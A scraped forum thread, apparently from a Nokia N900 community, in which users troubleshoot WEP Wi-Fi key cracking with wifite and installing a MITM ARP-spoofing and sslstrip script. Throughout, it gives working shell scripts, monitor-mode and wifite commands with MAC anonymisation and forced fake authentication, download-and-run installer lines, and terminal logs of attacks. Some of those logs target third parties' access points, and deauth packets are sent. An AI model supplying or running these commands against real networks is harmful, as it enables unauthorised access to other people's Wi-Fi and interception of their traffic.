Sorry, I can't understand where the error was. Is that something wrong in my guide? What have you done in order to succeed?

i instal step buy step from your website but is not working. i didnt seen the codes on your website

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon



#!/bin/sh
/opt/wifi_mon/unload.sh


the program worked after i put the codes manual. i dont know why.

i instal step buy step from your website but is not working. i didnt seen the codes on your website

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

#!/bin/sh
/opt/wifi_mon/unload.sh

That's because they are included in Step 3's package, try downloading it, extracting wepon and wepoff and read them, ta-daaaaaa codes inside ;)

dooohhh
man sorry i am a noob

dooohhh
man sorry i am a noob

No problem, we all started somewhere ;)

Could you please tell me where your error was, so that I can make the guide even easier? You didn't properly follow step 3, did you? :)

please look on post 62
theni i put the codes in xterm ( as root) and the program worked

Only load the bleeding edge drivers and let wifite do the rest ;)
Prove attached :P :D

I runned it without the --power --pps and --anon, just normal


You may like this piece of code which has the anonymous mode, power above 12 and 500 packets per second still enabled as vi_ proposed ;)

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

In the begining of the attack it says that packages pyritt and cowpatty are missing, should i install them ?

nope, it will run fine without them, macchanger should you install tho ;)

You can run the non-patched wifite.py, just give your /tmp more space as it dumps .ivs there (standard 1MB allows for only ~70000, so 32MB should be enough for anybody):

sudo mount -o remount,size=32M /tmp

and you're good to go

i'm new on this so called wepon...i have install everything & able to run the program with just one question???
after we start attacking any connection does the password will be reveal at the end or do we have you decrypt it like faircrack????
i'm asking cause i couldnt run the program to the end due to dry out battery...

i'm new on this so called wepon...i have install everything & able to run the program with just one question???
after we start attacking any connection does the password will be reveal at the end or do we have you decrypt it like faircrack????
i'm asking cause i couldnt run the program to the end due to dry out battery...

yes it shows the exact password as saved by the user ;)


http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

look at the end part of the video it will answer you :P

You can run the non-patched wifite.py, just give your /tmp more space as it dumps .ivs there (standard 1MB allows for only ~70000, so 32MB should be enough for anybody):

sudo mount -o remount,size=32M /tmp

and you're good to go

Thanks

Since I don't like being /tmp taking up rootspace, can't we mount it on opt? Dang here you see I am only a 3 months old linux user and lacks experience :(
Generally I want to have /tmp/ taking up /opt/ space instead of root space since I don't like the idea of root becoming full after using this. Maybe symlinking?

Thanks

Since I don't like being /tmp taking up rootspace, can't we mount it on opt? Dang here you see I am only a 3 months old linux user and lacks experience :(
Generally I want to have /tmp/ taking up /opt/ space instead of root space since I don't like the idea of root becoming full after using this. Maybe symlinking?

Fret not my son.

All we have to do is change where wifite dumps it's temporary files.

run in xterm:

sudo sed -i "s/(prefix='wifite')/(prefix='wifite',dir='\/opt\/tmp')/g" /opt/wifi_mon/wifite.py; sudo if [ ! -d "/opt/tmp" ]; then mkdir /opt/tmp; fi

This edits wifite to use /opt/tmp as the tmp folder, then checks to see if /opt/tmp exists and creates it if not.

Viola, no more /tmp/ restrictions!

Thanks works for wifite.py :D But when you run ettercap(not through YAMAS) it has also to the problem of /tmp being to small and stops after some time with capturing

So that's why I asked too ;)

Thanks works for wifite.py :D But when you run ettercap(not through YAMAS) it has also to the problem of /tmp being to small and stops after some time with capturing

So that's why I asked too ;)

Well you could symlink /tmp/ to /opt/tmp with

ln -s /tmp/ /opt/

or something. I don't know just experiment. Might make your device non bootable, might not.

Be brave and find out for the rest of us.

Dudes, resizing your /tmp is only until you reboot, so /opt problem solved. Wanna hack, get 31MB free, you still would have to.

vi_,

'%TMPDIR' is believe what is in wifite.py, so your command might not work, no idea.

You seem to be mighty linux guy, can/could you pinpoint the part in wifitie.py that dumps ivs there and deletes on exit? It always uses wep01.ivs filename, and with -p0841 attack it would be really great if it dumped it and not delete after unsuccessful crack. Sometimes running twice/thrice is required.

Dudes, resizing your /tmp is only until you reboot, so /opt problem solved. Wanna hack, get 31MB free, you still would have to.

vi_,

'%TMPDIR' is believe what is in wifite.py, so your command might not work, no idea.

You seem to be mighty linux guy, can/could you pinpoint the part in wifitie.py that dumps ivs there and deletes on exit? It always uses wep01.ivs filename, and with -p0841 attack it would be really great if it dumped it and not delete after unsuccessful crack. Sometimes running twice/thrice is required.

wifite patch/script (http://talk.maemo.org/showpost.php?p=1031980&postcount=80) to remove tmp problem.

tmp is defined at the start of the program using python mkdtemp function/call/thingy.

If you felt that non-removal of -p0841 files would be of benefit I highly suggest you get in contact with the creator of wifite.py. I am not keen to 'butcher' his work and break compatibility with future upgrades.

Tried to, no reply so far (1 month) which is why I'm reaching to other people. If it's addition (or removal) of one line, doesn't seem that butchery to me :P

<edit> Still after each update we have to change AUTOCRACK=9000 to a higher value as that kills N900 processor and is highly unlikely in most situations

After some test I see that rootfs space is unaffected by thhe space of /tmp/
I made tmp 16'MB and coppied a musicfile of 8MB to it, ran df -h and I saw that rootfs space still was the same ;)

So god knows where the space from /tmp is pulled from :O as opt didn't change also... gonna investigate if we can set 32MB as default of /tmp on boot...


edit: Never changed autocrack value :P Just put that ***** on 1GHZ and you have the key in les than 4 minutes ;)

As N900 seems to have a limit of around 200 packets/second it takes 6-7mins to get 50000 ivs which normally is enough. I noticed that -p0481 attacks sometimes generates dubiuos data, which is why I would love for Wifite script to dump it and append as 2-3 attacks is enough (maybe I got lucky and there was casual user in the meantime, no idea) in most cases.

Yes I had a pm with agogdata yesterday and I already told him that the pps limit is better to be set to 200 pps as it will work better for longer ranges and its a reasonable value for a mobile device :D

Yesterday I had cracked my own Network and that was to be exactly in 3 minutes and 36 seconds ;) That's the ideal situation tho :p

Yeah, with signal around -50 my own went swiftly in around 4 mins. In most _working_ cases it's 85-90 and gettin 100+ is excellent. Having to manually copy the ivs from auto-tool is a biatch though

I'm just curious, can WPA networks be cracked ? cause it asks for a dictionary.
and upgrading wifite (thanks to mr_pingu) seems to work better but still no luck with cracking

WPA networks are out of reach mostly. If a user is so informed to not use WEP he is also informed to not use his child's name as password when switching to WPA. Though sometimes works

Loving the idea behind this.

I am a novice at this kind of thing. I know there is a good chance of bricking the phone when doing these sorts of things which is why I'm getting a 2nd phone in the next few weeks specifically for this, and all the other stuff that I want to do that might reboot loop me (second hand of course, do I look rich?)

Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?

Thanks in advance, you bunch of sexeh geniuses, you! x

Loving the idea behind this.

I am a novice at this kind of thing. I know there is a good chance of bricking the phone when doing these sorts of things which is why I'm getting a 2nd phone in the next few weeks specifically for this, and all the other stuff that I want to do that might reboot loop me (second hand of course, do I look rich?)

Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?

Thanks in advance, you bunch of sexeh geniuses, you! x

Depends what it is you specifically want to do...

What are you wanting to do?

Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?
no you must have kernel power v47, its all in the 2nd post (what i'm using at least)

you bunch of sexeh geniuses, you! x
0_0 still with your weird posts i see

Google
http://pcsci3nce.info/?p=9
http://pcsci3nce.info/?p=11

As for the script - I haven't had the time to test it yet, however can it NOT be in this green font :X It is ugly :(

>< +1

I'll have a look at what you have done in the next few days and report back ;)

Too bad you split though, it might be a bit confusing for users, and counter productive. Check the original thread for a solution I thought about !

Loving the idea behind this.

I am a novice at this kind of thing. I know there is a good chance of bricking the phone when doing these sorts of things which is why I'm getting a 2nd phone in the next few weeks specifically for this, and all the other stuff that I want to do that might reboot loop me (second hand of course, do I look rich?)

Tell me this though, can this be done on a stock 600mhz N900 on the standard Kernel?

Thanks in advance, you bunch of sexeh geniuses, you! x

Installing bleeding edge drivers will not brick your phone. Actually, most things you can type into it have no chance of doing that. If you are participating in gamma releases (which I doubt based on your post) you are free to f..k your phone as much as you can and it should still work. Mine does

just tryed redownloading the yamas-n900 script using wget link an i get this error any ideas

/home/user # wget http://pastebin.com/raw.php?i=NtFnfJBt -O yamas_n900.sh && chmod +x ./yamas_n900
.shwget http://pastebin.com/raw.php?i=NtFnfJBt -O yamas_n900.sh && chmod +x ./yamas_n900.sh
--22:02:33-- http://pastebin.com/raw.php?i=NtFnfJBt
=> `yamas_n900.sh'
Resolving pastebin.com... 173.236.52.197
Connecting to pastebin.com|173.236.52.197|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

[ <=> ] 16,524 15.62K/s

22:02:34 (15.61 KB/s) - `yamas_n900.sh' saved [16524]

chmod: invalid option -- O
BusyBox v1.18.5 (Debian 1.18.5power1) multi-call binary.

Usage: chmod [-R] MODE[,MODE]... FILE...

Each MODE is one or more of the letters ugoa, one of the
symbols +-= and one or more of the letters rwxst

Options:
-R Recurse

/home/user #


many thanks

Cd to script folder and do manually
chmod +x yamas_n900.sh

Cd to script folder and do manually

i did that an the end thanks thou an also it still says ettercap is installed in usr/sbin/ettercap shouldnt it be usr/bin/ettercap

This is what I got :-s

Nokia-N900:~# wepon
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

.;' `;,
.;' ,;' `;, `;, WiFite r78
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[+] using interface "wlan0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C t[+] waiting 29 seconds for targets to appear. press Ctrl+C t[+] waiting 28 seconds for targets to appear. press Ctrl+C t[+] waiting 27 seconds for targets to appear. press Ctrl+C t[+] waiting 26 seconds for targets to appear. press Ctrl+C t[+] waiting 25 seconds for targets to appear. press Ctrl+C t[+] waiting 24 seconds for targets to appear. press Ctrl+C t[+] waiting 23 seconds for targets to appear. press Ctrl+C t[+] waiting 22 seconds for targets to appear. press Ctrl+C t[+] waiting 21 seconds for targets to appear. press Ctrl+C t[+] waiting 20 seconds for targets to appear. press Ctrl+C t[+] waiting 19 seconds for targets to appear. press Ctrl+C t[+] waiting 18 seconds for targets to appear. press Ctrl+C t[+] waiting 17 seconds for targets to appear. press Ctrl+C t[+] waiting 16 seconds for targets to appear. press Ctrl+C t[+] waiting 15 seconds for targets to appear. press Ctrl+C t[+] waiting 14 seconds for targets to appear. press Ctrl+C t[+] waiting 13 seconds for targets to appear. press Ctrl+C t[+] waiting 12 seconds for targets to appear. press Ctrl+C t[+] waiting 11 seconds for targets to appear. press Ctrl+C t[+] waiting 10 seconds for targets to appear. press Ctrl+C t[+] waiting 9 seconds for targets to appear. press Ctrl+C to[+] waiting 8 seconds for targets to appear. press Ctrl+C to[+] waiting 7 seconds for targets to appear. press Ctrl+C to[+] waiting 6 seconds for targets to appear. press Ctrl+C to[+] waiting 5 seconds for targets to appear. press Ctrl+C to[+] waiting 4 seconds for targets to appear. press Ctrl+C to[+] waiting 3 seconds for targets to appear. press Ctrl+C to[+] waiting 2 seconds for targets to appear. press Ctrl+C to[+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 0 targets and 0 clients found

[+] there are no targets with a power level greater than 12dB
[+] try selecting a lower power threshold


Nokia-N900:~# wepoff
ifconfig: invalid hw-addr A0
Nokia-N900:~#

Do you have the bleeding edge driver ? and i prefer the manual usage of wifite as mr_pingu said :
1)load the bleeding edge driver
2) /opt/wifite-directory/wifite.py
thats how you can choose your target and at earlier posts you can know how to set some settings (fake authentication - power)

By the way , this hack can attack only WEP protected networks ? or WPA/WPA2 too ?

I used # python /opt/wifi_mon/wifite.py , the script ran and started stearching for wifi networks but it didn't find anything , 0 wireless 0 results , after I pressed CTRL + C , it said me make sure airodump_ng runs correctly .

only WEP, it asks for a dictionary for WPA

only WEP, it asks for a dictionary for WPA

You can type none if it ask for a dictionary ;) Won't help that much though ;)

When i try to decompress wifite optimised for N900 from post 2 (wifi.tgz), I got error "it doesn't look like tar file". Tried bot with tar -xzvf and Xarchiver. Downloaded 3 times, size seems to be correct. Any ideas?

If someone still has doubts about what the script in the OP is and what it does, I've made a video showing YAMAS in action:

http://www.youtube.com/watch?v=9bSq7tXSGAo

PS: vi_ is right, this script is like putting an AK-47 in a child's hand :)

So, it's not related to hacking at all, but cracking. Please stop confusing people. The name of the thread makes it sound like a coding competition (as in hacking = coding), not like a tool for cracking things. Stop confusing us.

So, it's not related to hacking at all, but cracking. Please stop confusing people. The name of the thread makes it sound like a coding competition (as in hacking = coding), not like a tool for cracking things. Stop confusing us.

http://en.wikipedia.org/wiki/Hacker_(computer_security)

"A hacker is a person who breaks into computers and computer networks for profit, in protest, or because they are motivated by the challenge."

So this thread is pretty much about hacking I think.

If you read the article, you'll find that some people started a controversy about the hacker definition, so the word itself is confusing you, not us ;)

I successfully broke my wifi network as well. 5 digit password within few minutes (about 5 I guess). In my case fourth attack brings fruit, first three types of attack fails. Plus when I reattacked the same network for second time it took about a minute or so excluding that count down time while searching for network.

If no one else got problem with decompressing wifite, can i ask for uploading it as pure tarball, without compression? Sorry, i'm out of ideas why archive appear corrupted to me, no matter how many times i redownload it.

If no one else got problem with decompressing wifite, can i ask for uploading it as pure tarball, without compression? Sorry, i'm out of ideas why archive appear corrupted to me, no matter how many times i redownload it.

Just this once, just for you estel.

here. (http://ifile.it/dbk6rzh)

Just this once, just for you estel


here. (http://ifile.it/dbk6rzh)

kia-N900:~# wget http://pastebin.com/raw.php?i=z4uBgt64 -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh
--22:49:12-- http://pastebin.com/raw.php?i=z4uBgt64
=> `./yamas_n900.sh'
Resolving pastebin.com... 173.236.52.197
Connecting to pastebin.com|173.236.52.197|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: /z4uBgt64 [following]
--22:49:15-- http://pastebin.com/z4uBgt64
=> `./yamas_n900.sh'
Connecting to pastebin.com|173.236.52.197|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
22:49:16 ERROR 404: Not Found.

Hi was the script moved or something? Unknown paste ID.

Can you re-up please? Thanks

this script works amazing check it out

http://talk.maemo.org/showthread.php?t=73988

Hi was the script moved or something? Unknown paste ID.

Can you re-up please? Thanks

see first post.

http://pastebin.com/u5nLZzra

this script works amazing check it out

http://talk.maemo.org/showthread.php?t=73988

orly? last time is checked it is STILL broken.

orly? last time is checked it is STILL broken.

sorry to say dude but that script does work i have tryed it this morning an all was fine ....

one question but what is different to that an yours you just posted ??

update: new version, everything fixed now:o

You have probably seen the YAMAS MITM ARP spoof script that was recently announced. While an interesting idea, it was not written with the N900 in mind. Thus, it had numerous points that needed addressed before it could be considered ready for N900.


Greetz!

Thanks to comax for writing the thing.

Unhuman for hosting, alerting us to it.

Torpedo48 for testing, development.

Here I present a more N900 friendly version. This is better than the original because:

it has far fewer dependencies
is more compatible with a stock N900
it shutsdown ethercap nicely without barfing on the routers ARP table.

http://i54.tinypic.com/feqxpi.png

REQUIREMENTS:

iptables
nmap
iproute
python-twisted-web
python-openssl
python-scapy
libpcap0.8
libpcre3
sslstrip*see below
ettercap*see below

*Installation guide for ettercap, sslstrip and many other tools can be found at: http://pcsci3nce.info/?p=9

Refer to unhumans original post (http://talk.maemo.org/showthread.php?t=73988) and blog (http://pcsci3nce.info/?p=291) for more details.

Script here:

link (http://pastebin.com/u5nLZzra)


Installer!

navigate to the directory you want to put the script in then run:

wget http://pastebin.com/raw.php?i=u5nLZzra -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh

but it doesn't run in:
sh yasmas_n900.sh
or
bash yasmas_n900.sh

the same error loads as:
/home/user/MyDocs # bash yamas_n900.sh
: command not found 4:
'amas_n900.sh: line 26: syntax error near unexpected token `in
'amas_n900.sh: line 26: ` case $1 in
/home/user/MyDocs # sh yamas_n900.sh
: not foundsh: line 4:
yamas_n900.sh: line 26: syntax error: unexpected word (expecting "in")
/home/user/MyDocs #

but it doesn't run in:
sh yasmas_n900.sh
or
bash yasmas_n900.sh

the same error loads as:
/home/user/MyDocs # bash yamas_n900.sh
: command not found 4:
'amas_n900.sh: line 26: syntax error near unexpected token `in
'amas_n900.sh: line 26: ` case $1 in
/home/user/MyDocs # sh yamas_n900.sh
: not foundsh: line 4:
yamas_n900.sh: line 26: syntax error: unexpected word (expecting "in")
/home/user/MyDocs #

Try again.

orly? last time is checked it is STILL broken.

I swear I could have said the same about yours. Please stop using the name yamas, as well as my parsing method (that you really fcuked up by the way. I mean, guys, if you want something that does't work, sure go for this.).
The rest of the code is free for anyone to use, modify and stuff.

I'll leave you some time to do so, after what I'll have to ask some higher authority to comply.

For those who want a version that DO work (even though it still needs two dependencies more), head to http://talk.maemo.org/showthread.php?p=1038881#post1038881
It's currently being "converted" to work with ash. ETA : 3-4 days (due to my moving out, I don't have much time !). As for osso-xterm, I'll see that later on, I really don't feel it's a priority.

Try again.

it do work again

but how should I handle this? I am new to ettercap.

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 70)
Listening on wlan0...
ERROR : 92, Protocol not available
[ec_capture.c:capture_init:146]

pcap_open: wlan0: That device is not up

its working so fine thank you so much, im so happy

i have some problems with wepon, first time the program work fine, now i get this all the time ... any hints

Hi all.

When I try to reveal my wep key always got an: "fake authentication unsuccessful".

Aditionally 'wepoff' always says: "ifconfig: invalid hw-addr 00".

And I think that is not ok, right?

Thanks in advance.

Hi all.

When I try to reveal my wep key always got an: "fake authentication unsuccessful".

Aditionally 'wepoff' always says: "ifconfig: invalid hw-addr 00".

And I think that is not ok, right?

Thanks in advance.

1- ifconfig: invalid hw-addr 00 is normal, your wifi is back to normale now
2- i would recommend using more manual method
root
python /opt/wifi_mon/wifite.py
and if the fake authentication didn't pass through you can add --force-fake or --fake-force i don't really remember, so it should be like
python /opt/wifi_mon/wifite.py --force-fake
(i don't even remember if its -- or - so you should try it 4 times :) )

1- ifconfig: invalid hw-addr 00 is normal, your wifi is back to normale now
2- i would recommend using more manual method
root
python /opt/wifi_mon/wifite.py
and if the fake authentication didn't pass through you can add --force-fake or --fake-force i don't really remember, so it should be like
python /opt/wifi_mon/wifite.py --force-fake
(i don't even remember if its -- or - so you should try it 4 times :) )

Whooo learning fast agog :D

its "--force-fake" or simply "-f" ;)

Whooo learning fast agog :D

its "--force-fake" or simply "-f" ;)

i keep forgetting everything =D

1- ifconfig: invalid hw-addr 00 is normal, your wifi is back to normale now
...

That comes from an error in the original unload.sh script.

There are several ways to correct it. Have posted a solution here: http://talk.maemo.org/showpost.php?p=1039469&postcount=183

i love you guys

i have some problems with wepon, first time the program work fine, now i get this all the time ... any hints

i used to have the same issue you're having here, but in my case i was far from the router. try to get close and try many times.
in my phone attacking is till 9000 ivs and cracking is maximum at 25000 ivs.
just don't give up and try many times, i managed to crack after some time with the help of my friend mr_pingu :)

my router is close to me 3 m. i try and i try but still no luck.

do you have the bleeding edge driver installed ? and how do you load it ?

i got the bleeding edge instal. i try with wlan selector and i try manual, same results

then try this as a last option and i dont know if it works or not
1- downloas cowpatty http://www.mediafire.com/?8q4jc4cv82oclpl
2- move it to /usr/bin and chmod +x it
3- restart your phone
x- try other networks

i am getting estimated wait times around 2 hours. is that normal?

i am getting estimated wait times around 2 hours. is that normal?
Depends how fast you are injecting packets but seems quite a wait. Take for example, you should need about 50,000 ivs. The N900 should easily be able to inject about 200 packets per second. so
50000 / 200 = 250
250 / 60 = 4.16 mins
This is without any traffic been generated by clients already attatched to the AP.
This also depends on a few things, Proximity to AP, dropped packets, disauthentification notices and processes running in the background.
Try getting closer to the AP fo starters then make sure you have loaded the bleeding edge drivers properly.

wifi.tgz is necessary? coz i have bleeding edge drivers enabled and aircrack seems to work fine with those.. and im not sure if wifi.tgz has something additional.. *i'm still learning you know* :P

navigate to the directory you want to put the script in then run:

wget http://pastebin.com/raw.php?i=mBc1tKuL -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh

this wget link is dcead cann you reupload maybe ???

I followed the tut here http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

when i open a new console i type in "root"
and then "wepon" but I get a permission denied. Any ideas ?

I followed the tut here http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

when i open a new console i type in "root"
and then "wepon" but I get a permission denied. Any ideas ?

Probably you haven't followed the guide properly. In this case you might want to repeat the chmod commands, in order to make wepon executable.

it do work again

but how should I handle this? I am new to ettercap.

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 70)
Listening on wlan0...
ERROR : 92, Protocol not available
[ec_capture.c:capture_init:146]

pcap_open: wlan0: That device is not up

try installing ettercap from this
http://talk.maemo.org/showpost.php?p=1018150&postcount=1
everything is working perfectly with me

Probably you haven't followed the guide properly. In this case you might want to repeat the chmod commands, in order to make wepon executable.

I did repeat step 3 and chmod shows no error ,but if I try this commands

# mv /home/user/MyDocs/wepon /usr/bin/
# mv /home/user/MyDocs/wepoff /usr/bin/

I get an error message:
"mv: cannot remove /usr/bin/wepon : Is a directory"

wrong post sorry

Does this actually harm anything on the network, or does it give you the just the key to get access in a proper way?

Hello gays,i'm new in the forum and i need your help.I did that hack successfully at the first time but i can't do it any more !! It sead (unable to generate enough IVS in time) it capturing (0/sec) ivs and some times (3 to 70/sec) ivs !!! please help :(

how can I select "lower power threshold"? All the time I try to use wepon I get the msg:
there are no targets with power level greater than 12dB

Does this actually harm anything on the network, or does it give you the just the key to get access in a proper way?

it doesnt harm anything as far as I know. it just generates the key for you. (correct me if im wrong guys)

regards
Csaba

Guys,

please help me...i already installed wifite and successfully hacked few AP but i still got one problem...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError

i kept getting this error when i tried to CTRL+C to attack next AP since i cant manually select AP to attack. any solution? or maybe any command to modify wifite.py to make it manually select AP rather than auto attack all....

Guys,

please help me...i already installed wifite and successfully hacked few AP but i still got one problem...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError

i kept getting this error when i tried to CTRL+C to attack next AP since i cant manually select AP to attack. any solution? or maybe any command to modify wifite.py to make it manually select AP rather than auto attack all....

form your log there is no other AP detected that can be attack....
pressing CTRL+C is to use stop any attacks while pressing C is to use another method of attacking AP not selecting other AP to attacks....

form your log there is no other AP detected that can be attack....
pressing CTRL+C is to use stop any attacks while pressing C is to use another method of attacking AP not selecting other AP to attacks....

Hi ,

this is my full log... i got 2 AP but i want to attack jtlew instead of PS3... so i CTRL+C when its start to attack PS3...but the error in red came out...any solution?

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[!] no wireless interfaces are in monitor mode!

[+] select which device you want to put into monitor mode:
1. wlan0 TI WL1251 wl12xx - [phy0]
[+] select the wifi interface (between 1 and 1): 1
[+] putting "wlan0" into monitor mode...
[+] searching for devices in monitor mode...
[+] defaulting to interface "mon0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 29 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 28 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 27 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 26 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 25 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 24 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 23 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 22 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 21 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 20 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 19 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 18 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 17 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 16 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 15 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 14 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 13 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 12 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 11 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 10 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 9 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 8 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 7 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 6 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 5 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 4 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 3 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 2 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 6 targets and 3 clients found

[+] added to attack list: "PS3-3823927" (15dB)
[+] added to attack list: "jtlew" (15dB)
[+] 2 access points targeted for attack

[+] in order to crack WPA, you will need to enter a dictionary file
[+] enter the path to the dictionary to use, or "none" to not crack at all:
none

[+] estimated maximum wait time is 45 minutes
[+] changing mac address to 00:70:39:A2:05:AB... changed!

[+] attacking "PS3-3823927"...
[0:05:00] starting wpa handshake capture
[0:04:43] sent 3 deauth packets; no handshake yet Nokia-N900:/root#
[0:04:41] attack on "PS3-3823927" interrupted

[+] please select a menu option below:
[n]ext attack (there is 1 target remaining)
[e]xit the program completely
[+] enter option (n, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2007, in attack
attack_wpa(index)
File "/opt/wifi_mon/wifite.py", line 3045, in attack_wpa
typed=raw_input()
EOFError

SOLVED!!

upgrade busybox and no more issue..thanks nway

Link is down, can someone reupload it ?

hi, everyone!

i'm facing a problem with wepon, so i would like to ask for some help:

i upgraded the power kernel from v49 to v50 yesterday, and when i tested whether everything is working fine, i tried wepon and saw the following error message:

"BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ sudo gainroot
Root shell enabled


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user # wepon
insmod: error inserting '/opt/wifi_mon/compat.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/cfg80211.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/mac80211.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/wl1251.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/wl1251_spi.ko': -1 Unknown symbol in module
ifconfig: SIOCGIFFLAGS: No such device
nl80211 not found.
ifconfig: SIOCGIFFLAGS: No such device
ifconfig: SIOCGIFFLAGS: No such device
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; No such device.
ifconfig: SIOCGIFFLAGS: No such device
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

.;' `;,
.;' ,;' `;, `;, WiFite r78
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[!] no wireless interfaces are in monitor mode!
[!] no devices are capable of monitor mode!
[!] perhaps you need to install new drivers
[+] this program will now exit."

the wifi was on, so i think there were wireless interfaces...
so i tried the followings: i downloaded the wepon, wepoff and the wifi.tgz again, and put them into the right folders, and typed the chmod +x commands. but it did not help, the error message is the same. is it possible that wepon is not compatible with power kernel v50...? (with v49 it run smoothly)

thanks,

jm

For power kernel 50 you need updated drivers:

http://talk.maemo.org/showthread.php?t=83718#post1193490

For power kernel 50 you need updated drivers:

http://talk.maemo.org/showthread.php?t=83718#post1193490

